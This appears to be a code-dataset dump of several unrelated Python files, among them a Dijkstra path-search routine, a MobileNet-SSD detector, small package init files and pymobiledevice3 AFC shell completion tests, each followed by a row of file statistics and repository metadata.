print("INFO: Distance from start_id <%d> to end_id <%d> = %s" % (start_id, end_id, (str(delta_T_max) if not delta_T_max is None else "None" ) ) )
print("dist = " + str(dist))
print("prev = " + str(prev))
print("T_zone_nodes[end_id] = " + str(T_zone_nodes[end_id]))
#
# Generate the path
if (dist[end_id] is None) or (dist[end_id] == max_value):
# The end_id is not reachable from start_id
# in the sense of "valid" edge traversal
print('INFO: The end_id is not reachable from start_id in the sense of "valid" edge traversal.')
return None
# If the goal is reachable
path = get_path(prev, end_id, is_reversing_path=True)
if path[0] != start_id:
print("ERROR: path[0] != start_id, something wrong in dijkstra.")
else:
# print("INFO: The path generated correctly in dijkstra.")
pass
# test
print("path = " + str(path) )
print("\n")
#
return path
#--------------------------------#
# Reversed traversal
#--------------------------------------#
def generate_reverse_graph(adj):
"""
This function is for used with the adj_graph defined in GEOMETRY_TASK_GRAPH
outputs
- adj_reversed: a reversed version of adj (All directed edges will be reversed.)
"""
adj_reversed = [[] for _ in range(len(adj))]
for nid_u in range(len(adj)):
for nid_v, eid_uv in adj[nid_u]:
adj_reversed[nid_v].append( (nid_u,eid_uv) )
#
return adj_reversed
def dijkstras_backtrack(adj_in, edges, T_zone_end, start_id, end_id, top_priority_for_activated_agent=False, agent_id=None):
"""
This method ues dijkstra alogorithm to find out the best path
or find out that there is no path at all.
Optimization problem:
Given a graph, the state of graph, the time-zone at end_id,
find a path with "valid edges" that minimize the
"duration_max" at reaching the start_id
(before passing through the first edge)
inputs
- adj: original adjacent graph
- T_zone_end = (T_min, T_max)
- start_id
- end_id
- top_priority_for_activated_agent
- agent_id (default: None): If agent_id is given, ignore this agent in this edge.
outputs
- path/None: a sequence (list) of node_id from start_id to end_id
or "None" means no valid path
"""
# Get a reversed graph
adj = generate_reverse_graph(adj_in)
# Decide that if we only see the activated agent!!
only_count_activated_agent = top_priority_for_activated_agent
# We minimize the T_max
id_opt_target = 1 # minimize the total duration_max
max_value = float('inf') # sys.maxsize
# Get sizes
num_nodes = len(adj)
num_edges = len(edges)
# Initialize the dist and prev
dist = [max_value for _ in range(num_nodes)] # distance list, "None" stand for infinity
prev = [None for _ in range(num_nodes)] # Parents list, "None" stands for no parent
T_zone_nodes = [(max_value, max_value) for _ in range(num_nodes)] # (T_min, T_max) of each node / "Key" for passing edges!
#-------------------------------#
# dist[s] = 0 <-- acturally, minimum distance in graph, not actually need to be zero
dist[end_id] = 0 # Count for the duration, minimum or maximum (or maybe the difference??)
T_zone_nodes[end_id] = T_zone_end
# Make a min-heap
heap = Queue.PriorityQueue()
for u in range(num_nodes):
heap.put_nowait( (dist[u], u) )
# Iteration
while (not heap.empty()):
# Get a node_id from heap (currently smallest distance)
#----------------------------------#
uh = heap.get_nowait()
# Filter out some trash in heap
while uh[0] != dist[uh[1]] and (not heap.empty()):
# Pop out old one and try new one
uh = heap.get_nowait()
if heap.empty():
# This means that the heap actually has no valuable things
# in this iteration, just leave
break
#----------------------------------#
# for all (u,v) in E
# We have to find nodes through "valid" edges
# that is, it is "possible to pass", it is activated (if we want to check)
nid_u = uh[1]
# print("uh[0] = " + str(uh[0]) + ", uh[1] = " + str(uh[1]))
for nid_v, eid in adj[nid_u]:
# Check if the edge is "valid"
# nid_u --eid--> nid_v
if edges[eid].is_possible_to_pass_backtrack(T_zone_nodes[nid_u], only_count_activated_agent, agent_id):
T_v_tmp = edges[eid].get_T_zone_start_from_end(T_zone_nodes[nid_u]) # Update time_zone of the node
if T_v_tmp[1] < T_v_tmp[0]:
# This edge is closed, unable to be backtracked
continue
# Relax
if id_opt_target == 2:
weight_uv = edges[eid].duration[1] - edges[eid].duration[0] # Minimoze the difference of duration_max and duration_min, for minimizing the uncertainties
else:
weight_uv = edges[eid].duration[id_opt_target] # Minimize the total duration with specified id_opt_target
#
if dist[nid_v] > (dist[nid_u] + weight_uv):
dist[nid_v] = (dist[nid_u] + weight_uv)
T_zone_nodes[nid_v] = T_v_tmp # Update time_zone of the node
prev[nid_v] = nid_u
"""
print("update (u, v) = (%d, %d)" % (nid_u, nid_v))
print("dist = " + str(dist))
print("prev = " + str(prev))
print("\n")
"""
heap.put_nowait( (dist[nid_v], nid_v) )
#
# end for
# end while
"""
# Post proccesing: replace max_value with "None"
for i in range(len(dist)):
if dist[i] == max_value:
dist[i] = None
"""
# test
try:
delta_T_max = dist[start_id] - dist[end_id]
except:
delta_T_max = None
#
print("\n")
print("INFO: Dijkstra (backtrack) finished")
print("INFO: Distance from start_id <%d> to end_id <%d> = %s" % (start_id, end_id, (str(delta_T_max) if not delta_T_max is None else "None" ) ) )
print("dist = " + str(dist))
print("prev = " + str(prev))
print("T_zone_nodes[start_id] = " + str(T_zone_nodes[start_id]))
#
# Generate the path
if (dist[start_id] is None) or (dist[start_id] == max_value):
# The end_id is not reachable from start_id
# in the sense of "valid" edge traversal
print('INFO: The start_id is not reachable from end_id in the sense of "valid" edge backward traversal.')
return None
# If the goal is reachable
path = get_path(prev, start_id, is_reversing_path=False)
# No need to reverse the path
if path[-1] != end_id:
print("ERROR: path[-1] != end_id, something wrong in dijkstra.")
else:
# print("INFO: The path generated correctly in dijkstra.")
pass
# test
print("path = " + str(path) )
print("\n")
#
return path
#--------------------------------------#
| 36.308219 | 172 | 0.590643 | 2,226 | 15,903 | 4.020216 | 0.113657 | 0.018997 | 0.02816 | 0.035982 | 0.802771 | 0.782322 | 0.770254 | 0.752933 | 0.752263 | 0.747458 | 0 | 0.003545 | 0.290574 | 15,903 | 437 | 173 | 36.391304 | 0.789665 | 0.382569 | 0 | 0.621469 | 0 | 0 | 0.066364 | 0.002561 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056497 | false | 0.022599 | 0.00565 | 0 | 0.112994 | 0.112994 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ad995fe6d8f4abb4d8706874ba0cc1b03fd061c7 | 48 | py | Python | timeline/__init__.py | meinert/timesatpoi | 1a82fb4c9950e7636f74fd651d55fde45adca961 | [
"BSD-2-Clause"
] | null | null | null | timeline/__init__.py | meinert/timesatpoi | 1a82fb4c9950e7636f74fd651d55fde45adca961 | [
"BSD-2-Clause"
] | null | null | null | timeline/__init__.py | meinert/timesatpoi | 1a82fb4c9950e7636f74fd651d55fde45adca961 | [
"BSD-2-Clause"
] | null | null | null | from .core import hmm
from .timesatpoi import *
| 16 | 25 | 0.770833 | 7 | 48 | 5.285714 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 48 | 2 | 26 | 24 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ad9c335db07dd60bf2d59fd98c04fc2fe5fcc21c | 11,649 | py | Python | model/mobile_ssd_v1/net.py | BoChenUIUC/realtime-action-detection | 98f6d0b3f5faa4da6a1395daf07771d5f157ba8f | [
"MIT"
] | null | null | null | model/mobile_ssd_v1/net.py | BoChenUIUC/realtime-action-detection | 98f6d0b3f5faa4da6a1395daf07771d5f157ba8f | [
"MIT"
] | null | null | null | model/mobile_ssd_v1/net.py | BoChenUIUC/realtime-action-detection | 98f6d0b3f5faa4da6a1395daf07771d5f157ba8f | [
"MIT"
] | null | null | null | '''SSD model with VGG16 as feature extractor.'''
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
from torch.autograd import Variable
import sys
sys.path.insert(0, '/home/bo/research/realtime-action-detection')
from layers.functions.sph_prior_box import SphPriorBox
from data import v1,v2,v3,v4,v5
class MobileNetExtractor512(nn.Module):
def __init__(self):
super(MobileNetExtractor512, self).__init__()
def conv_bn(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True)
)
def conv_dw(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
nn.BatchNorm2d(inp),
nn.ReLU(inplace=True),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.BatchNorm2d(oup),
nn.ReLU(inplace=True),
)
self.model = nn.Sequential(
conv_bn(3, 64, 2),
conv_dw(64, 64, 1),
conv_dw(64, 128, 2),
conv_dw(128, 128, 1),
conv_dw(128, 256, 2),
conv_dw(256, 256, 1),
conv_dw(256, 256, 1),
conv_dw(256, 512, 1),
conv_dw(512, 512, 1),
conv_dw(512, 512, 1),
conv_dw(512, 512, 2),
conv_dw(512, 512, 1),
conv_dw(512, 512, 1),
conv_dw(512, 1024, 1),
conv_dw(1024, 1024, 1),
)
self.extras = nn.ModuleList([
nn.Sequential(
nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=1),
nn.ReLU(),
nn.Conv2d(in_channels=256, out_channels=512, kernel_size=3, stride=2, padding=1),
nn.ReLU()
),
nn.Sequential(
nn.Conv2d(in_channels=512, out_channels=128, kernel_size=1),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
nn.ReLU()
),
nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
nn.ReLU()
),
nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
nn.ReLU()
),
nn.Sequential(
nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
nn.ReLU(),
nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=1),
nn.ReLU()
)
])
def forward(self, x):
hs = []
for i,l in enumerate(self.model):
x = l(x)
if i == 9 or i == 14:
hs.append(x)
for l in self.extras:
x = l(x)
hs.append(x)
return hs
# def SeperableConv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0):
# """Replace Conv2d with a depthwise Conv2d and Pointwise Conv2d.
# """
# return Sequential(
# Conv2d(in_channels=in_channels, out_channels=in_channels, kernel_size=kernel_size,
# groups=in_channels, stride=stride, padding=padding),
# ReLU(),
# Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
# )
# class MobileNetExtractorLite512(nn.Module):
# def __init__(self):
# super(MobileNetExtractor512, self).__init__()
# def conv_bn(inp, oup, stride):
# return nn.Sequential(
# nn.Conv2d(inp, oup, 3, stride, 1, bias=False),
# nn.BatchNorm2d(oup),
# nn.ReLU(inplace=True)
# )
# def conv_dw(inp, oup, stride):
# return nn.Sequential(
# nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
# nn.BatchNorm2d(inp),
# nn.ReLU(inplace=True),
# nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
# nn.BatchNorm2d(oup),
# nn.ReLU(inplace=True),
# )
# self.model = nn.Sequential(
# conv_bn(3, 64, 2),
# conv_dw(64, 64, 1),
# conv_dw(64, 128, 2),
# conv_dw(128, 128, 1),
# conv_dw(128, 256, 2),
# conv_dw(256, 256, 1),
# conv_dw(256, 256, 1),
# conv_dw(256, 512, 1),
# conv_dw(512, 512, 1),
# conv_dw(512, 512, 1),
# conv_dw(512, 512, 2),
# conv_dw(512, 512, 1),
# conv_dw(512, 512, 1),
# conv_dw(512, 1024, 1),
# conv_dw(1024, 1024, 1),
# )
# self.extras = nn.ModuleList([
# nn.Sequential(
# nn.Conv2d(in_channels=1024, out_channels=256, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=256, out_channels=512, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=512, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# ),
# nn.Sequential(
# nn.Conv2d(in_channels=256, out_channels=128, kernel_size=1),
# nn.ReLU(),
# SeperableConv2d(in_channels=128, out_channels=256, kernel_size=3, stride=2, padding=1),
# )
# ])
# def forward(self, x):
# hs = []
# for i,l in enumerate(self.model):
# x = l(x)
# if i == 9 or i == 14:
# hs.append(x)
# for l in self.extras:
# x = l(x)
# hs.append(x)
# return hs
class MobileSSD512(nn.Module):
steps = (8, 16, 32, 64, 128, 256, 512)
box_sizes = (35.84, 76.8, 153.6, 230.4, 307.2, 384.0, 460.8, 537.6) # default bounding box sizes for each feature map.
aspect_ratios = ((2,), (2, 3), (2, 3), (2, 3), (2, 3), (2,), (2,))
fm_sizes = (64, 32, 16, 8, 4, 2, 1)
def __init__(self, num_classes, cfg):
super(MobileSSD512, self).__init__()
self.num_classes = num_classes
self.num_anchors = (4, 6, 6, 6, 6, 4, 4)
self.in_channels = (512, 1024, 512, 256, 256, 256, 256)
self.extractor = MobileNetExtractor512()
priorbox = SphPriorBox(cfg)
with torch.no_grad():
self.priors = priorbox.forward().cuda()
self.softmax = nn.Softmax(dim=1).cuda()
self.loc_layers = nn.ModuleList()
self.cls_layers = nn.ModuleList()
for i in range(len(self.in_channels)):
self.loc_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i]*4, kernel_size=3, padding=1)]
self.cls_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i]*self.num_classes, kernel_size=3, padding=1)]
self._initialize_weights()
def forward(self, x):
loc_preds = []
cls_preds = []
xs = self.extractor(x)
for i, x in enumerate(xs):
loc_pred = self.loc_layers[i](x)
loc_pred = loc_pred.permute(0,2,3,1).contiguous()
loc_preds.append(loc_pred.view(loc_pred.size(0),-1,4))
cls_pred = self.cls_layers[i](x)
cls_pred = cls_pred.permute(0,2,3,1).contiguous()
cls_preds.append(cls_pred.view(cls_pred.size(0),-1,self.num_classes))
loc_preds = torch.cat(loc_preds, 1)
cls_preds = torch.cat(cls_preds, 1)
return loc_preds, cls_preds, self.priors
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
n = m.weight.size(1)
m.weight.data.normal_(0, 0.01)
m.bias.data.zero_()
# class MobileSSDLite512(nn.Module):
# steps = (8, 16, 32, 64, 128, 256, 512)
# box_sizes = (35.84, 76.8, 153.6, 230.4, 307.2, 384.0, 460.8, 537.6) # default bounding box sizes for each feature map.
# aspect_ratios = ((2,), (2, 3), (2, 3), (2, 3), (2, 3), (2,), (2,))
# fm_sizes = (64, 32, 16, 8, 4, 2, 1)
# def __init__(self, num_classes, cfg):
# super(MobileSSDLite512, self).__init__()
# self.num_classes = num_classes
# self.num_anchors = (4, 6, 6, 6, 6, 4, 4)
# self.in_channels = (512, 1024, 512, 256, 256, 256, 256)
# self.extractor = MobileNetExtractorLite512()
# priorbox = SphPriorBox(cfg)
# with torch.no_grad():
# self.priors = priorbox.forward().cuda()
# self.softmax = nn.Softmax(dim=1).cuda()
# self.loc_layers = nn.ModuleList()
# self.cls_layers = nn.ModuleList()
# for i in range(len(self.in_channels)):
# self.loc_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i]*4, kernel_size=3, padding=1)]
# self.cls_layers += [nn.Conv2d(self.in_channels[i], self.num_anchors[i]*self.num_classes, kernel_size=3, padding=1)]
# self._initialize_weights()
# def forward(self, x):
# loc_preds = []
# cls_preds = []
# xs = self.extractor(x)
# for i, x in enumerate(xs):
# loc_pred = self.loc_layers[i](x)
# loc_pred = loc_pred.permute(0,2,3,1).contiguous()
# loc_preds.append(loc_pred.view(loc_pred.size(0),-1,4))
# cls_pred = self.cls_layers[i](x)
# cls_pred = cls_pred.permute(0,2,3,1).contiguous()
# cls_preds.append(cls_pred.view(cls_pred.size(0),-1,self.num_classes))
# loc_preds = torch.cat(loc_preds, 1)
# cls_preds = torch.cat(cls_preds, 1)
# return loc_preds, cls_preds, self.priors
# def _initialize_weights(self):
# for m in self.modules():
# if isinstance(m, nn.Conv2d):
# n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
# m.weight.data.normal_(0, math.sqrt(2. / n))
# if m.bias is not None:
# m.bias.data.zero_()
# elif isinstance(m, nn.BatchNorm2d):
# m.weight.data.fill_(1)
# m.bias.data.zero_()
# elif isinstance(m, nn.Linear):
# n = m.weight.size(1)
# m.weight.data.normal_(0, 0.01)
# m.bias.data.zero_()
def test():
net = MobileSSD512(25,v3)
loc_preds, cls_preds, priors = net(Variable(torch.randn(16,3,512,1024)))
print(loc_preds.size(), cls_preds.size(), priors.size())
if __name__ == '__main__':
test()
| 37.699029 | 129 | 0.539961 | 1,559 | 11,649 | 3.862091 | 0.10712 | 0.05813 | 0.023252 | 0.044843 | 0.874772 | 0.874772 | 0.866135 | 0.853845 | 0.851354 | 0.850025 | 0 | 0.093522 | 0.316164 | 11,649 | 308 | 130 | 37.821429 | 0.662315 | 0.488797 | 0 | 0.326241 | 0 | 0 | 0.008766 | 0.007391 | 0 | 0 | 0 | 0 | 0 | 1 | 0.056738 | false | 0 | 0.056738 | 0.014184 | 0.184397 | 0.007092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a8e02c138e0376d6a6c4f6ae67818b95bdc22961 | 100 | py | Python | astruct/__init__.py | misterfifths/nis_mods | 9d460414cb88d10f2737e9be90babe85c9856001 | [
"MIT"
] | 1 | 2021-10-18T13:42:09.000Z | 2021-10-18T13:42:09.000Z | astruct/__init__.py | misterfifths/nis-mods | 9d460414cb88d10f2737e9be90babe85c9856001 | [
"MIT"
] | null | null | null | astruct/__init__.py | misterfifths/nis-mods | 9d460414cb88d10f2737e9be90babe85c9856001 | [
"MIT"
] | null | null | null | # pyright: reportUnusedImport=none
from . import type_hints
from .typed_struct import typed_struct
| 20 | 38 | 0.83 | 13 | 100 | 6.153846 | 0.692308 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 100 | 4 | 39 | 25 | 0.909091 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a8e712eac3d4723bb96269e4cb4432a469174b16 | 261 | py | Python | ariadne_jwt/__init__.py | abaumg/ariadne-jwt | edb9d63b27cf072da4f9940ed81db9d21d95307a | [
"MIT"
] | 24 | 2020-09-05T17:34:16.000Z | 2022-03-17T11:45:55.000Z | ariadne_jwt/__init__.py | abaumg/ariadne-jwt | edb9d63b27cf072da4f9940ed81db9d21d95307a | [
"MIT"
] | 16 | 2020-09-05T16:55:49.000Z | 2022-03-20T16:44:25.000Z | ariadne_jwt/__init__.py | abaumg/ariadne-jwt | edb9d63b27cf072da4f9940ed81db9d21d95307a | [
"MIT"
] | 12 | 2020-09-15T21:53:48.000Z | 2022-03-20T15:07:43.000Z | from .mutations import (resolve_verify, resolve_refresh, resolve_revoke, resolve_token_auth, jwt_schema)
from .scalar import GenericScalar
__all__ = ['resolve_verify', 'resolve_refresh', 'resolve_revoke', 'resolve_token_auth', 'jwt_schema', 'GenericScalar', ]
| 52.2 | 120 | 0.804598 | 31 | 261 | 6.258065 | 0.451613 | 0.134021 | 0.206186 | 0.278351 | 0.670103 | 0.670103 | 0.670103 | 0.670103 | 0.670103 | 0.670103 | 0 | 0 | 0.084291 | 261 | 4 | 121 | 65.25 | 0.811715 | 0 | 0 | 0 | 0 | 0 | 0.321839 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d12c530460a7203a43389fdac34d227de92c6e1a | 43 | py | Python | pyspj/__init__.py | HansBug/pyspj | ed776cf7d2d1766ee4c2152221d1d3dbdd18d93a | [
"Apache-2.0"
] | null | null | null | pyspj/__init__.py | HansBug/pyspj | ed776cf7d2d1766ee4c2152221d1d3dbdd18d93a | [
"Apache-2.0"
] | null | null | null | pyspj/__init__.py | HansBug/pyspj | ed776cf7d2d1766ee4c2152221d1d3dbdd18d93a | [
"Apache-2.0"
] | null | null | null | from .entry import *
from .models import *
| 14.333333 | 21 | 0.72093 | 6 | 43 | 5.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186047 | 43 | 2 | 22 | 21.5 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d14efa4a299788bb79d2226bc2a3b4538aed7f41 | 64 | py | Python | acq4/devices/DAQGeneric/__init__.py | aleonlein/acq4 | 4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555 | [
"MIT"
] | 47 | 2015-01-05T16:18:10.000Z | 2022-03-16T13:09:30.000Z | acq4/devices/DAQGeneric/__init__.py | aleonlein/acq4 | 4b1fcb9ad2c5e8d4595a2b9cf99d50ece0c0f555 | [
"MIT"
] | 48 | 2015-04-19T16:51:41.000Z | 2022-03-31T14:48:16.000Z | acq4/devices/DAQGeneric/__init__.py | sensapex/acq4 | 9561ba73caff42c609bd02270527858433862ad8 | [
"MIT"
] | 32 | 2015-01-15T14:11:49.000Z | 2021-07-15T13:44:52.000Z | from __future__ import print_function
from .DAQGeneric import *
| 21.333333 | 37 | 0.84375 | 8 | 64 | 6.125 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 64 | 2 | 38 | 32 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
d1742f28a056bc38a289926917fc66fcd6ecbec5 | 42 | py | Python | face_utils/cropping/__init__.py | HermasTV/mmfu | dc14f0c06dbff3f1c92606ff11fc30d782ea23ef | [
"MIT"
] | 1 | 2021-04-28T02:32:28.000Z | 2021-04-28T02:32:28.000Z | face_utils/cropping/__init__.py | HermasTV/mmfu | dc14f0c06dbff3f1c92606ff11fc30d782ea23ef | [
"MIT"
] | null | null | null | face_utils/cropping/__init__.py | HermasTV/mmfu | dc14f0c06dbff3f1c92606ff11fc30d782ea23ef | [
"MIT"
] | null | null | null | from face_utils.cropping import cropping
| 14 | 40 | 0.857143 | 6 | 42 | 5.833333 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 42 | 2 | 41 | 21 | 0.945946 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0f0e2e41b3f5b5b70d0f8865580a3b4982061faa | 15,954 | py | Python | tests/services/test_afc_shell.py | iOSForensics/pymobiledevice3 | 6b148f4e58cc51cb44c18935913a3e6cec5b60d5 | [
"MIT"
] | 1 | 2022-01-20T16:53:15.000Z | 2022-01-20T16:53:15.000Z | tests/services/test_afc_shell.py | iOSForensics/pymobiledevice3 | 6b148f4e58cc51cb44c18935913a3e6cec5b60d5 | [
"MIT"
] | null | null | null | tests/services/test_afc_shell.py | iOSForensics/pymobiledevice3 | 6b148f4e58cc51cb44c18935913a3e6cec5b60d5 | [
"MIT"
] | null | null | null | from pathlib import Path
from unittest import mock
import pytest
from cmd2_ext_test import ExternalTestMixin
from cmd2 import CommandResult
import gnureadline
from pymobiledevice3.services.afc import AfcShell
SINGLE_PARAM_COMMANDS = ['edit', 'cd', 'walk', 'cat', 'rm', 'head', 'hexdump', 'stat']
class AfcShellTester(ExternalTestMixin, AfcShell):
def __init__(self, *args, **kwargs):
# gotta have this or neither the plugin or cmd2 will initialize
super().__init__(*args, **kwargs)
@pytest.fixture(scope='function')
def afc_shell(lockdown):
app = AfcShellTester(lockdown)
try:
yield app
finally:
app.afc.service.close()
def get_completions(line, part, app):
def get_line():
return line
def get_begidx():
return len(line) - len(part)
def get_endidx():
return len(line)
with mock.patch.object(gnureadline, 'get_line_buffer', get_line):
with mock.patch.object(gnureadline, 'get_begidx', get_begidx):
with mock.patch.object(gnureadline, 'get_endidx', get_endidx):
app.complete(part, 0)
return app.completion_matches
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion(command, afc_shell):
filenames = get_completions(f'{command} D', 'D', afc_shell)
assert 'DCIM' in filenames
assert 'Downloads' in filenames
assert 'Books' not in filenames
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion_empty(command, afc_shell):
filenames = get_completions(f'{command} ', '', afc_shell)
assert 'DCIM' in filenames
assert 'Downloads' in filenames
assert 'Books' in filenames
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion_with_space(command, afc_shell):
afc_shell.afc.makedirs('aa bb cc/dd ee ff')
try:
assert ['"aa bb cc" '] == get_completions(f'{command} aa ', 'aa ', afc_shell)
assert ['aa bb cc" '] == get_completions(f'{command} "aa ', 'aa ', afc_shell)
assert ['"aa bb cc/dd ee ff" '] == get_completions(f'{command} aa bb cc/dd ee', 'aa bb cc/dd ee', afc_shell)
finally:
afc_shell.afc.rm('aa bb cc')
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_in_folder_completion(command, afc_shell):
afc_shell.afc.makedirs('temp1/temp2')
afc_shell.afc.makedirs('temp1/temp4')
try:
assert ['temp1 '] == get_completions(f'{command} temp', 'temp', afc_shell)
assert ['temp1/temp2', 'temp1/temp4'] == get_completions(f'{command} temp1/', 'temp1/', afc_shell)
assert ['temp1/temp2', 'temp1/temp4'] == get_completions(f'{command} temp1/temp', 'temp1/temp', afc_shell)
finally:
afc_shell.afc.rm('temp1')
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_completion_after_cd(command, afc_shell):
afc_shell.afc.makedirs('temp1/temp2')
afc_shell.afc.makedirs('temp1/temp4')
afc_shell.app_cmd('cd temp1')
completions = get_completions(f'{command} temp', 'temp', afc_shell)
afc_shell.afc.rm('temp1')
assert ['temp2', 'temp4'] == completions
@pytest.mark.parametrize('command', SINGLE_PARAM_COMMANDS)
def test_not_over_completing(command, afc_shell):
assert not get_completions(f'{command} DCIM ', '', afc_shell)
def test_mv_completion(afc_shell):
afc_shell.afc.makedirs('temp1')
afc_shell.afc.set_file_contents('temp1/temp.txt', b'data')
try:
assert get_completions('mv temp1/t', 'temp1/t', afc_shell) == ['temp1/temp.txt ']
assert get_completions('mv temp1/temp.txt tem', 'tem', afc_shell) == ['temp1 ']
finally:
afc_shell.afc.rm('temp1')
def test_push_completion(afc_shell, tmp_path: Path):
(tmp_path / 'temp1.txt').write_text('hey1')
(tmp_path / 'temp2.txt').write_text('hey2')
